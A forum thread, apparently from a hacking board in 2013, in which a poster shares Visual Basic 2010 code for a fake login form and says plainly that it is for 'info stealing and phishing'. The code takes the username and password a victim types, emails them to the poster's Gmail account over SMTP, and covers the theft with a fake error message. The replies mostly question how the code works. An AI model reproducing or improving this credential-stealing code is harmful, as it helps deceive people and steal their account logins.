Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


Visual Basic 2010 email sender filter_list
Author
Message
Visual Basic 2010 email sender #1
you can use this for info stealing and phishing

you need:
2 textboxes
1 button

put this to the very top:
imports system.net.mail

button1 code:
Dim smtp as new SmtpClient()
dim mail as new mailmessage()
mail.to.add("youremailhere@gmail.com")
mail.from = new mailaddress("youremail@gmail.com")
mail.subject = "account info"
mail.body = "username: " & textbox1.text & " password: " & textbox2.text
smtp.credentials = new net.networkcredential("youremail@gmail.com", "your gmail password here")
smtp.enablessl = true
smtp.port = 587
smtp.Host = "smtp.gmail.com"
smtp.Send(mail)
msgbox("optional error/message")

Reply

RE: Visual Basic 2010 email sender #2
What that msgbox(optional error/message) should do, there is no try-catch statement?
So it just prints that message which has nothing to do with code? Very useful.

And you didn't explain much. You just told what to do, not how to do.


Reply

RE: Visual Basic 2010 email sender #3
(08-18-2013, 10:20 AM)Slarek Wrote: What that msgbox(optional error/message) should do, there is no try-catch statement?
So it just prints that message which has nothing to do with code? Very useful.

And you didn't explain much. You just told what to do, not how to do.

well it is like fake error but in fact it sends the user information to your email

Reply

RE: Visual Basic 2010 email sender #4
Is it your code? I doubt that, have you tried if this works?


Reply

RE: Visual Basic 2010 email sender #5
(08-18-2013, 11:08 AM)Slarek Wrote: Is it your code? I'm sorry doubt, have you tried if this works?
Can you tell me where do you need 2 text box? You're not asking any information from so they are useless.

i have tried it and success...

put the textboxes to the form and one button and double click the button in editing and in the very top of all put imports system.net.mail
and you need to look you put your right gmail address and correct password in the script

Reply

RE: Visual Basic 2010 email sender #6
(08-18-2013, 11:53 AM)theplayer232 Wrote:
(08-18-2013, 11:08 AM)Slarek Wrote: Is it your code? I'm sorry doubt, have you tried if this works?
Can you tell me where do you need 2 text box? You're not asking any information from so they are useless.

i have tried it and success...

put the textboxes to the form and one button and double click the button in editing and in the very top of all put imports system.net.mail
and you need to look you put your right gmail address and correct password in the script

You don't have to explain how to do this, i know how it works.
So your button 1 code only sends the message to email?


Reply

RE: Visual Basic 2010 email sender #7
(08-18-2013, 12:04 PM)Slarek Wrote:
(08-18-2013, 11:53 AM)theplayer232 Wrote:
(08-18-2013, 11:08 AM)Slarek Wrote: Is it your code? I'm sorry doubt, have you tried if this works?
Can you tell me where do you need 2 text box? You're not asking any information from so they are useless.

i have tried it and success...

put the textboxes to the form and one button and double click the button in editing and in the very top of all put imports system.net.mail
and you need to look you put your right gmail address and correct password in the script

You don't have to explain how to do this, i know how it works.
So your button 1 code only sends the message to email?

yep

Reply

RE: Visual Basic 2010 email sender #8
(08-18-2013, 04:34 PM)theplayer232 Wrote:
(08-18-2013, 12:04 PM)Slarek Wrote:
(08-18-2013, 11:53 AM)theplayer232 Wrote:
(08-18-2013, 11:08 AM)Slarek Wrote: Is it your code? I'm sorry doubt, have you tried if this works?
Can you tell me where do you need 2 text box? You're not asking any information from so they are useless.

i have tried it and success...

put the textboxes to the form and one button and double click the button in editing and in the very top of all put imports system.net.mail
and you need to look you put your right gmail address and correct password in the script

You don't have to explain how to do this, i know how it works.
So your button 1 code only sends the message to email?

yep

So you have another code where you ask data from user?


Reply

RE: Visual Basic 2010 email sender #9
(08-18-2013, 05:19 PM)Slarek Wrote:
(08-18-2013, 04:34 PM)theplayer232 Wrote:
(08-18-2013, 12:04 PM)Slarek Wrote:
(08-18-2013, 11:53 AM)theplayer232 Wrote:
(08-18-2013, 11:08 AM)Slarek Wrote: Is it your code? I'm sorry doubt, have you tried if this works?
Can you tell me where do you need 2 text box? You're not asking any information from so they are useless.

i have tried it and success...

put the textboxes to the form and one button and double click the button in editing and in the very top of all put imports system.net.mail
and you need to look you put your right gmail address and correct password in the script

You don't have to explain how to do this, i know how it works.
So your button 1 code only sends the message to email?

yep

So you have another code where you ask data from user?

no?

Reply

RE: Visual Basic 2010 email sender #10
My bad, didn't notice that part of the code. Sorry!


Reply







Users browsing this thread: 1 Guest(s)